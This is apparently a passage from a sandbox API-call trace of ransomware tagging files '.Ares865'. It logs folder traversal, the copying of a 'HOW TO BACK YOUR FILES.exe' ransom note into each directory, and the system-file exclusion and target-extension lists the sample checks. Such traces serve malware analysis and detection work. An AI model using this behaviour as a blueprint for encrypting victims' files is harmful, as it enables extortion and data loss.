[0040.212] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0040.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0040.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0040.212] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos") returned 35 [0040.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0040.212] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.212] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.212] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.213] GetLastError () returned 0x0 [0040.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.213] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.213] CloseHandle (hObject=0x124) returned 1 [0040.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.213] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.213] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.213] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.213] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.213] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.213] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.213] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.214] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.214] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.214] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.214] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0040.214] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0040.214] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0040.214] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\*") returned 37 [0040.214] lstrcpyW (in: lpString1=0x2e2e8a8, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0040.214] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0040.214] lstrlenW (lpString="Ares865") returned 7 [0040.214] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0040.214] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494f7340, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.214] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.214] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="aoldtz.exe") returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="bootmgr") returned 1 [0040.214] lstrcmpiW (lpString1="Sample Videos", lpString2="temp") returned -1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="pagefile.sys") returned 1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="boot") returned 1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="ids.txt") returned 1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="perflogs") returned 1 [0040.215] lstrcmpiW (lpString1="Sample Videos", lpString2="MSBuild") returned 1 [0040.215] lstrlenW (lpString="Sample Videos") returned 13 [0040.215] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\desktop.ini.Ares865") returned 55 [0040.215] lstrcpyW (in: lpString1=0x2e2e8a8, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0040.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0040.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2cb310 [0040.215] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2268 | out: ListHead=0x2e77d0, ListEntry=0x2d2268) returned 0x2d2248 [0040.215] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0040.215] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.215] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2268 [0040.215] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" [0040.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0040.215] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned 49 [0040.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos" [0040.215] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.215] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.216] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.216] GetLastError () returned 0x0 [0040.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.216] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.216] CloseHandle (hObject=0x124) returned 1 [0040.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.216] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.216] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.216] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.216] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.216] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.216] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.216] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.216] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49993de0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0040.216] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.216] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0040.217] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0040.217] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0040.217] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\*") returned 51 [0040.217] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0040.217] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0040.217] lstrlenW (lpString="Ares865") returned 7 [0040.217] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0040.217] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49569760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.217] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.217] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="aoldtz.exe") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2=".") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="..") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="windows") returned -1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="bootmgr") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="temp") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="pagefile.sys") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="boot") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ids.txt") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ntuser.dat") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="perflogs") returned 1 [0040.217] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="MSBuild") returned 1 [0040.217] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0040.218] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\Sample Videos\\desktop.ini.Ares865") returned 69 [0040.218] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="Wildlife.wmv.Ares865" | out: lpString1="Wildlife.wmv.Ares865") returned="Wildlife.wmv.Ares865" [0040.218] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0040.218] lstrlenW (lpString="Ares865") returned 7 [0040.218] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0040.218] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 0 [0040.218] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.218] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0040.218] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0040.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed7f0 | out: hHeap=0x2b0000) returned 1 [0040.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0040.218] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures") returned 37 [0040.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0040.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.218] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.219] GetLastError () returned 0x0 [0040.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.219] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.219] CloseHandle (hObject=0x124) returned 1 [0040.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.219] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.219] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.219] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.219] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.219] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.219] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.220] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.220] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.220] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.220] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.220] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.220] lstrlenW (lpString="desktop.ini") returned 11 [0040.220] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\*") returned 39 [0040.220] lstrcpyW (in: lpString1=0x2e2e8ac, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.220] lstrlenW (lpString="desktop.ini") returned 11 [0040.220] lstrlenW (lpString="Ares865") returned 7 [0040.220] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.220] lstrlenW (lpString=".dll") returned 4 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.220] lstrlenW (lpString=".lnk") returned 4 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.220] lstrlenW (lpString=".ini") returned 4 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.220] lstrlenW (lpString=".sys") returned 4 [0040.220] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.220] lstrlenW (lpString="desktop.ini") returned 11 [0040.220] lstrlenW (lpString="bak") returned 3 [0040.220] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.221] lstrlenW (lpString="ba_") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.221] lstrlenW (lpString="dbb") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.221] lstrlenW (lpString="vmdk") returned 4 [0040.221] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.221] lstrlenW (lpString="rar") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="rar") returned 